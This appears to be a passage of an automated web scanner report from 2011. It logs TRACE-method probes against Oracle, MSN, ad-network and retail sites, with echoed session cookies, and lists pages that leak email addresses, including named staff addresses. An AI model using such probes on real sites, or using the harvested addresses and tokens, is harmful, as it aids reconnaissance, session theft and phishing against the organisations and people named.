Cookie: 5a4f5828fcbb3d45; BIGipServermktap-dne_http_pool=2953613965.3848.0000; s_cc=true; s_wgw_lv_s=First%20Visit; p_mcc=WWOCOMINTMAINPAGEBNR8da1b; p_org_id=1001; p_lang=US; shopCartId=6496552; source=OU; territoryCode=US; o
...[SNIP]...

21.15. http://dynpages-mktas.oracle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dynpages-mktas.oracle.com
Path:	/

Request

TRACE / HTTP/1.0
Host: dynpages-mktas.oracle.com
Cookie: 63786d87af05a9b7

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:35 GMT
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 63786d87af05a9b7; s_cc=true; s_wgw_lv_s=First%20Visit; p_mcc=WWOCOMINTMAINPAGEBNR8da1b; p_org_id=1001; p_lang=US; shopCartId=6496552; source=OU; territoryCode=US; org_id=1001; lang=US; SearchParams-cookie=%3CSearchPar
...[SNIP]...

21.16. http://education.oracle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/

Request

TRACE / HTTP/1.0
Host: education.oracle.com
Cookie: 100c93683da489bc

Response

HTTP/1.1 200 OK
Content-Type: message/http
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057691094728704,0)
Content-Length: 577
Date: Tue, 06 Sep 2011 15:54:56 GMT

TRACE / HTTP/1.1
Connection: Keep-Alive
Cookie: 100c93683da489bc; BIGipServerfapap-education_http_pool=2534249101.24862.0000; s_cc=true; s_nr=1315342486444; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25
...[SNIP]...

21.17. https://education.oracle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://education.oracle.com
Path:	/

Request

TRACE / HTTP/1.0
Host: education.oracle.com
Cookie: b0e7a50feb3ea41e

Response

HTTP/1.1 200 OK
Content-Type: message/http
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=144115362442430059,0)
Content-Length: 722
Date: Tue, 06 Sep 2011 16:00:49 GMT

TRACE / HTTP/1.1
Connection: Keep-Alive
Cookie: b0e7a50feb3ea41e; shopCartId=deleted; source=deleted; org_id=deleted; lang=deleted; territoryCode=deleted; JSESSIONID=296f58b30d8bf36ac8351a3c4f52694a554feac8fa994cae89b313a158bdb177.e34MaNqNax0RbO0Qbh8Tbh4Mbxz0.1; nO
...[SNIP]...

21.18. http://fido.fetchback.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fido.fetchback.com
Path:	/

Request

TRACE / HTTP/1.0
Host: fido.fetchback.com
Cookie: 6d071c91a467bef0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:41 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: fido.fetchback.com
Cookie: 6d071c91a467bef0; JSESSIONID=429C8C2837D4276076F2BA795EBE1EF0.jvmdb3; __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|ut
...[SNIP]...

21.19. http://imp.fetchback.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/

Request

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: cfb5c538100001de

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: cfb5c538100001de; __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_131318
...[SNIP]...

21.20. http://legolas.nexac.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://legolas.nexac.com
Path:	/

Request

TRACE / HTTP/1.0
Host: legolas.nexac.com
Cookie: b48bdce55b91b692

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:01 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: legolas.nexac.com
Cookie: b48bdce55b91b692; lgtix=SQACADUB; na_id=ignore; na_tc=Y; OAX=Mhd7ak48ZSEAAtYi
X-Forwarded-For: 50.23.123.106

21.21. http://msnbcmedia.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msnbcmedia.msn.com
Path:	/

Request

TRACE / HTTP/1.0
Host: msnbcmedia.msn.com
Cookie: 3816ff354b1c074f

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Tue, 06 Sep 2011 15:08:36 GMT
Content-Type: message/http
Content-Length: 616
Expires: Tue, 06 Sep 2011 15:08:36 GMT
Connection: close

TRACE / HTTP/1.0
Host: msnbcmedia.msn.com
Cookie: 3816ff354b1c074f; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; TOptOut=1; MC1=V=3&GUID=27de0d4a057a405d855bc5c261d99b62; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=c3d56ab0e9ef4d31a12e4ebc6c4c7324&bd=2011-08-25T22:
...[SNIP]...

21.22. http://optimized-by.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: 9154129bdfca7a14

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:05 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 9154129bdfca7a14; put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g
...[SNIP]...

21.23. http://ping.crowdscience.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ping.crowdscience.com
Path:	/

Request

TRACE / HTTP/1.0
Host: ping.crowdscience.com
Cookie: 798b459e39cdfb17

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Content-Type: message/http
Date: Tue, 06 Sep 2011 15:32:56 GMT
Connection: close

TRACE / HTTP/1.0
X-Forwarded-Proto: http
Host: ping.crowdscience.com
X-Cluster-Client-Ip: 50.23.123.106
Cookie: 798b459e39cdfb17; __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b
Connection: Keep-Alive

21.24. http://pixel.everesttech.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.everesttech.net
Path:	/

Request

TRACE / HTTP/1.0
Host: pixel.everesttech.net
Cookie: fefd9dd3df6e0f8c

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:08:45 GMT
Server: Apache
Vary: X-EF-Forwarded-For
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.everesttech.net
Cookie: fefd9dd3df6e0f8c; gglck=zqROZUBXyFQAAIdR; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; everest_session_v2=ts5OZjd7UQcAAI3@
Connection: Keep-Alive
X-EF-Forwarded-For: 50.23.123.106

21.25. http://pixel.fetchback.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/

Request

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: d4fd0ffa3d47f679

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:28 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: d4fd0ffa3d47f679; __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; eng=1_131367
...[SNIP]...

21.26. http://r.openx.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/

Request

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 48163cefde847169

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:14 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 48163cefde847169; p=1315103289; i=d2a43928-76cd-49ea-b899-b41fb371435f
X-Forwarded-For: 50.23.123.106

21.27. http://rt.legolas-media.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/

Request

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 139323cd46f98b49

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:55:10 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 139323cd46f98b49; ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgtix=BgABADMBSQABADMBHAAGADUBDAABADMB/QABADABXwABADMB

21.28. http://serve.directdigitalllc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://serve.directdigitalllc.com
Path:	/

Request

TRACE / HTTP/1.0
Host: serve.directdigitalllc.com
Cookie: 4dbf8df06c6498b6

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Tue, 06 Sep 2011 15:15:58 GMT
Server: Apache/2.2.16 (Amazon)
Content-Length: 183
Connection: Close

TRACE / HTTP/1.1
host: serve.directdigitalllc.com
Cookie: 4dbf8df06c6498b6
X-Forwarded-For: 50.23.123.106
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive

21.29. http://tap.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: 253e5867faf3ceb6

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:05 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: 253e5867faf3ceb6; put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g
...[SNIP]...

21.30. http://tracker.wordstream.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tracker.wordstream.com
Path:	/

Request

TRACE / HTTP/1.0
Host: tracker.wordstream.com
Cookie: c22d18764c46e182

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:28 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tracker.wordstream.com
Cookie: c22d18764c46e182

21.31. http://tracking.hubspot.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tracking.hubspot.com
Path:	/

Request

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: c3a9c6a20fa59d45

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:27:56 GMT
Server: Apache/2.2.6 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: c3a9c6a20fa59d45; .ASPXANONYMOUS=tnXvN-SJzQEkAAAANDYwNWYxM2EtN2M2MC00YWU2LWFlZTctOTU1OTY4ZTNlZTI00; hubspotutk=9c6ca7a5-ca15-46b9-a6b6-0f57cca70bb6; hsfirstvisit=http%253A%252F%252Fwww.sophelle.com%252F%7c%7c2011-09-0
...[SNIP]...

21.32. http://www.beautyproductsdirect.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beautyproductsdirect.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.beautyproductsdirect.com
Cookie: aa40a3667cf5f260

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:23 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: aa40a3667cf5f260
Host: www.beautyproductsdirect.com

21.33. http://www.fekkai.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fekkai.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.fekkai.com
Cookie: f416391d50c085ae

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:38 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.fekkai.com
Cookie: f416391d50c085ae; fekkai_flash_intro_cookie=True

21.34. http://www.fetchback.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fetchback.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.fetchback.com
Cookie: 8d1db15e52e7b97d

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:47:41 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.fetchback.com
Cookie: 8d1db15e52e7b97d; __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_131318
...[SNIP]...

21.35. http://www.gillettevenus.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.gillettevenus.com
Cookie: 72dfe71d12de6daa

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:32 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gillettevenus.com
Cookie: 72dfe71d12de6daa; preferredLocale=en_US; JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61

21.36. http://www.readwriteweb.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.readwriteweb.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.readwriteweb.com
Cookie: 4eb89b621c4755a9

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:43 GMT
Server: Apache/2.x (Hardened)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.readwriteweb.com
Cookie: 4eb89b621c4755a9; PHPSESSID=uu8u8il3haqs9qituee6bsgku7; mobify=0; __qca=P0-110430846-1315341155951; __qseg=Q_D; _fm_bizo=bizo%3Dindustry-business_services%2Clocation-texas%3B

22. Email addresses disclosed previous next
There are 119 instances of this issue:

http://ads1.msn.com/library/dap.js
http://assets1.csc.com/es/downloads/7380_2.pdf
http://assets1.csc.com/lef/downloads/LEF_Briefing_TestingCoE_052809.pdf
http://blog.ulf-wendel.de/
http://blogs.oracle.com/otn/
http://blogs.oracle.com/otn/feed/entries/atom
http://blogs.oracle.com/otn/feed/entries/rss
https://dne.oracle.com/pls/uns/OPT_OUT.th
http://edge.sapient.com/assets/scripts/global.js
http://education.oracle.com/admin/jscripts/rd_temp_config/1001US_rd_temp_config.js
http://education.oracle.com/education/jscripts/JSSerializer.js
http://education.oracle.com/education/jscripts/OUheaderCSS.js
http://education.oracle.com/education/jscripts/s_code.js
https://education.oracle.com/admin/jscripts/rd_temp_config/_rd_temp_config.js
https://education.oracle.com/education/jscripts/OUheaderCSS.js
https://education.oracle.com/education/jscripts/s_code.js
http://event.on24.com/r.htm
https://forms.netsuite.com/app/site/crm/externalleadpage.nl
https://forums.oracle.com/forums/themes/english/resources/s_code.js
https://login.cnbc.com/cas/js/cnbc_login.js
https://myprofile.oracle.com/EndUser/jscripts/s_code.js
https://oracleus.wingateweb.com/portal/newreg.ww
https://register.cnbc.com/forgotPassword1.do
http://search.oracle.com/search/searchui/s_code.js
https://shop.oracle.com/pls/ostore/f
https://support.bigcommerce.com/javascript/livesearch.js
http://thinkwrap.com/wp-content/themes/vision/library/media/js/jquery.innerfade.js
http://twitter.com/favorites/shopify.json
http://webzoomers.com/
https://www.atg.com/en/password/request/
https://www.atg.com/javascript/form.js
http://www.beautyproductsdirect.com/
http://www.beautyproductsdirect.com/inc/js/jquery.innerfade.js
http://www.beautyproductsdirect.com/lashes.html
http://www.covergirl.com/CSS/jqModal.css
http://www.covergirl.com/Script/jqModal_mod.js
http://www.covergirl.com/Script/jquery.cookie.js
http://www.covergirl.com/Script/jquery.hoverIntent.min.js
http://www.csc.com/contact_us
http://www.csc.com/javascripts/public/s_code.js
http://www.deloitte.com/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.hoverIntent.js
http://www.dove.us/Resources/JS/colorbox/jquery.colorbox.js
http://www.fekkai.com/js/mootools-1.2.4.2-more.js
http://www.fekkai.com/js/multibox/multiBox.js
http://www.fekkai.com/js/multibox/overlay.js
http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
http://www.harbottle.com/hnl/pages/pubs/479
http://www.netsuite.com/portal/javascript/DD_roundies.js
http://www.netsuite.com/portal/javascript/jquery.colorbox-min.js
http://www.netsuite.com/portal/javascript/jquery.colorbox.js
http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html
http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html
http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html
http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html
http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html
http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html
http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html
http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html
http://www.oracle.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js
http://www.oracle.com/openworld/contact/index.html
http://www.oracle.com/openworld/register/packages/index.html
http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html
http://www.oracle.com/technetwork/oramag/magazine/home/index.html
http://www.oracle.com/us/assets/masterhp.js
http://www.oracle.com/us/ciocentral/index.html
http://www.oracle.com/us/corporate/Acquisitions/index.html
http://www.oracle.com/us/corporate/analystrelations/index.html
http://www.oracle.com/us/corporate/citizenship/index.html
http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html
http://www.oracle.com/us/corporate/insight/index.html
http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html
http://www.oracle.com/us/corporate/press/Executives/index.html
http://www.oracle.com/us/corporate/press/index.html
http://www.oracle.com/us/corporate/profit/index.html
http://www.oracle.com/us/corporate/publishing/index.html
http://www.oracle.com/us/education/oukc/email-079121.html
http://www.oracle.com/us/industries/financial-services/index.html
http://www.oracle.com/us/industries/retail/index.html
http://www.oracle.com/us/partnerships/solutions/index.html
http://www.oracle.com/us/products/applications/primavera/index.html
http://www.oracle.com/us/sun/index.html
http://www.oracle.com/us/support/advanced-customer-services/index.html
http://www.oracle.com/us/support/contact-068555.html
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js
http://www.rayalab.com/
http://www.rayalab.com/free_sample.html
http://www.resourcepoint.net/ATG-Services.htm
http://www.resourcepoint.net/TibcoTech.htm
http://www.resourcepoint.net/contactus.htm
http://www.resourcepoint.net/form.htm
http://www.revsolutionsinc.com/careers.html
http://www.revsolutionsinc.com/careers_req_7.html
http://www.revsolutionsinc.com/contact_us.html
http://www.sophelle.com/
http://www.sophelle.com/Contact-Us/
http://www.sophelle.com/Contact-Us/thank-you.html
http://www.sophelle.com/Products/
http://www.sophelle.com/Products/CQ/free-trial.html
http://www.sophelle.com/Products/CQ/index.html
http://www.sophelle.com/Products/accelerator2.html
http://www.sophelle.com/Success-Stories/
http://www.sophelle.com/Success-Stories/Automated-Website-Testing.html
http://www.sophelle.com/products/cq/
http://www.sophelle.com/products/cq/expert-analysis.html
http://www.sophelle.com/products/cq/frequently-asked-questions.html
http://www.sophelle.com/products/cq/functional-testing.html
http://www.sophelle.com/products/cq/performance-testing.html
http://www.sophelle.com/products/cq/pricing-options.html
http://www.sophelle.com/products/cq/thank-you-trial.html
http://www.sophelle.com/products/cq/user-interface-testing.html
http://www.tenzing.com/atg-ecommerce-hosting.asp
http://www.tenzing.com/cloud/cloud-pricing.asp
http://www.tenzing.com/cloud/sign-up-now.asp
http://www.tenzing.com/css/basic_stylesheet_v1.1.css
http://www.tenzing.com/css/navigation_stylesheet_v1.1.css
http://www.tenzing.com/hosting-solutions.asp
http://www.tenzing.com/js/jquery/jquery.accordion.js
http://www.tenzing.com/sitemap.asp
http://www.tenzing.com/validation.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

22.1. http://ads1.msn.com/library/dap.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads1.msn.com
Path:	/library/dap.js

Issue detail

The following email address was disclosed in the response:

inet@microsoft.com

Request

GET /library/dap.js HTTP/1.1
Host: ads1.msn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: MUID=360F843730F542A7A6E2E0ACB7BADB9D; MC1=V=3&GUID=27de0d4a057a405d855bc5c261d99b62; mh=MSFT; CC=US; Sample=43; CULTURE=EN-US; expid=id=c3d56ab0e9ef4d31a12e4ebc6c4c7324&bd=2011-08-25T22:26:18.658&v=2; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; __qca=P0-302102338-1314847295226; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; VWCUKP300=L123100/Q74127_14103_2078_083111_1_090411_476531x468891x083111x1x1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=172800
Date: Tue, 06 Sep 2011 15:00:13 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 31 Aug 2011 23:19:17 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Expires: Tue, 06 Sep 2011 23:25:14 GMT
Content-Length: 13811
X-WR-MODIFICATION: Content-Length
Connection: keep-alive

var _daprr=new Array('http://rad.msn.com/ADSAdClient31.dll?GetSAd=','http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=', 'http://b.rad.msn.com/ADSAdClient31.dll?GetSAd=');var _daprs=0;var _daplp='http:/
...[SNIP]...

22.2. http://assets1.csc.com/es/downloads/7380_2.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets1.csc.com
Path:	/es/downloads/7380_2.pdf

Issue detail

The following email addresses were disclosed in the response:

pgustafs@csc.com
rknode@csc.com
tgraner@csc.com
wkoff@csc.com

Request

GET /es/downloads/7380_2.pdf HTTP/1.1
Host: assets1.csc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.3. http://assets1.csc.com/lef/downloads/LEF_Briefing_TestingCoE_052809.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets1.csc.com
Path:	/lef/downloads/LEF_Briefing_TestingCoE_052809.pdf

Issue detail

The following email addresses were disclosed in the response:

TESTING.COE@CSC.COM
wmcgirr@csc.com

Request

GET /lef/downloads/LEF_Briefing_TestingCoE_052809.pdf HTTP/1.1
Host: assets1.csc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
x-amz-id-2: zYYJljlF5SFE+GrD4CJRlBUcaGTK1OuLAnYS8gsTn5kHdogibKjGZ/Zkyh5XQiZb
x-amz-request-id: 7262CFD5F70F1995
Date: Tue, 06 Sep 2011 17:06:04 GMT
Last-Modified: Mon, 08 Jun 2009 18:04:03 GMT
ETag: "600baff3759b06e56fd71b9bed3cb369"
Accept-Ranges: bytes
Content-Type: application/pdf
Content-Length: 1587670
Server: AmazonS3
Age: 1
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: f6b26ddea16ad0da23493e32edb9bf8a272ca7921b731bc65066ee96909744e4136b8374a30ab146
Via: 1.0 c36847c5252e758d61b94a1d396be659.cloudfront.net:11180 (CloudFront), 1.0 23d5f9ecd89e26f0c254accbbb676a22.cloudfront.net:11180 (CloudFront)
Connection: close

%PDF-1.5
%....
1 0 obj
<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 381 0 R/MarkInfo<</Marked true>>>>
endobj
2 0 obj
<</Type/Pages/Count 18/Kids[ 3 0 R 15 0 R 25 0 R 33 0 R 41 0 R 79
...[SNIP]...
</Type/Action/S/URI/URI(mailto:TESTING.COE@CSC.COM) >
...[SNIP]...
</Type/Action/S/URI/URI(mailto:wmcgirr@csc.com) >
...[SNIP]...

22.4. http://blog.ulf-wendel.de/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.ulf-wendel.de
Path:	/

Issue detail

The following email addresses were disclosed in the response:

contact@qafoo.com
team@thephp.cc

Request

GET / HTTP/1.1
Host: blog.ulf-wendel.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.5. http://blogs.oracle.com/otn/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.oracle.com
Path:	/otn/

Issue detail

The following email addresses were disclosed in the response:

20ALEX.KEH@ORACLE.COM
20DAVID.PEAKE@ORACLE.COM
20KUASSI.MENSAH@ORACLE.COM
ASHLEY.CHEN@ORACLE.COM

Request

GET /otn/ HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=utf-8
Content-Language: en
X-Oracle-DMS-ECID: 51608471331278653
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=51608471331278653,0:1)
Last-Modified: Tue, 06 Sep 2011 15:35:46 GMT
Content-Length: 82084
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       
       <meta
...[SNIP]...
<a href="ASHLEY.CHEN@ORACLE.COM%20DAVID.PEAKE@ORACLE.COM%20KUASSI.MENSAH@ORACLE.COM%20ALEX.KEH@ORACLE.COM">
...[SNIP]...

22.6. http://blogs.oracle.com/otn/feed/entries/atom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.oracle.com
Path:	/otn/feed/entries/atom

Issue detail

The following email addresses were disclosed in the response:

20ALEX.KEH@ORACLE.COM
